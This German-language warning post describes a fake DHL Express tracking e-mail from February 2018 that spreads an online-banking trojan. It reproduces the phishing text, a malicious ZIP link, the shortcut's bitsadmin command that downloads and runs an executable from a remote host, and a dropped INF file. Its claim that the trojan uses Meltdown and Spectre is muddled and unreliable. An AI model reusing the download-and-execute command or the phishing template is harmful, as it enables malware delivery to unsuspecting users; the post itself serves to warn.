TRACKID:4859593JSHGD von DHL EXPRESS ([email protected]) bringt einen Online-Banking-Trojaner!

Am Mittwoch, den 28. Februar 2018 wurde durch unbekannte Dritte die folgende betrügerische E-Mail in deutscher Sprache versendet. Klicken Sie nicht auf den Link und öffnen Sie nicht die ZIP-Datei! Eine Verknüpfung würde einen Online-Banking-Trojaner nachladen, der anschließend aufgrund von entstehenden Sicherheitslücken von Meltdown und Spectre in den Prozessoren Intel, AMD und ARM unter dem Vorwand eines neuen Verschlüsselungsalgorithmus Geld zu klauen!

Betreff: TRACKID:

4859593JSHGD
Absender: DHL EXPRESS ([email protected])

DHL Express
Guten Tag!
Herr/Frau (Vorname Nachname)
DHL Express Tracking-Benachrichtigung: Mi, 28. Feb. 2018
Benutzerdefinierte Referenz: 93-2AJQKDHDHGU
Tracking-Nummer: 4859593JSHGD
Abholdatum: Mi, 28. Februar 2018
Service: Luft
Stücke: 1

Verarbeitung abgeschlossen

Einzelheiten entnehmen Sie bitte dieser Datei.

https://xsmicro.us8.list-manage.com/ unsubscribe?u=df4da7bb1346c932aa2cbfac9&id=030dba9427&e=18f1cf25ea&c= 4c08590a8d

This email was sent to (E-Mail-Adresse)
why did I get this?            unsubscribe from this list             update subscription preferences
Xs Micro · 2951 Saturn Street #D · Brea, Ca 92821 · USA

Achtung: Es handelt sich um eine gefälschte E-Mail! Klicken Sie deswegen nicht auf den Link und öffnen Sie nicht das ZIP-Archiv! Es handelt sich nicht um eine Tracking-Benachrichtigung! Der Name des Absenders wird missbräuchlich verwendet.

Der Link „Einzelheiten entnehmen Sie bitte dieser Datei“ verlinkt auf die Adresse auf pioneersimpex.com/dhl%20Verarbeitung%20abgeschlossen.zip, von der ein ZIP-Archiv geladen würde.

dhl Verarbeitung abgeschlossen.zip

Das ZIP – Archiv enthält eine Verknüpfung. Klicken Sie nicht darauf, da sonst eine bösartige Software nachgeladen würde!

Diese Verknüpfung würde so aussehen:

%ComSpec% /c „bitsadmin /transfer WINXLSVR /priority foreground http://lan.grandguard.org/xNrqbvUnTH.php %TEMP%\WinXlS.exe > NUL & start %TEMP%\WinXlS.exe“

Wie man hier sehen kann, soll eine Datei von lan.grandguard.org/xNrqbvUnTH.php geladen und im Temp-Verzeichnis als „WinXIS.exe“ abgelegt und ausgeführt werden.

Würde man diese Adresse im Browser aufrufen, würde eine Datei geladen:

94865fa079509a3966595e821c62180e.exe

Laut Virustotal beträgt die Erkennungsrate für diese Datei 12/67!

Bei der Ausführung der Datei würde gleichzeitig auch eine WinXIS.inf erzeugt.

Die WinXIS.inf hat folgenden Inhalt:

[Version]
signature = „$CHICAGO$“
AdvancedINF = 2.5, „You need a new version of advpack.dll“

[DefaultInstall]
RunPreSetupCommands = coaqmbutxjmqhhiqgbnckwblbuewfhsawwcidbvmvmhbdjjixxwotvqcsxh:2

[coaqmbutxjmqhhiqgbnckwblbuewfhsawwcidbvmvmhbdjjixxwotvqcsxh]
C:\Users\user\AppData\Local\Temp\WinXlS.exe

 

Es handelt sich um die gleiche Betrugswelle, die bereits seit Ende der letzten Woche verbreitet wird. Wie das Trojanische Pferd im Online-Banking Geld klauen möchte, sehen Sie in den Warnungen

Kommentar(e)

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert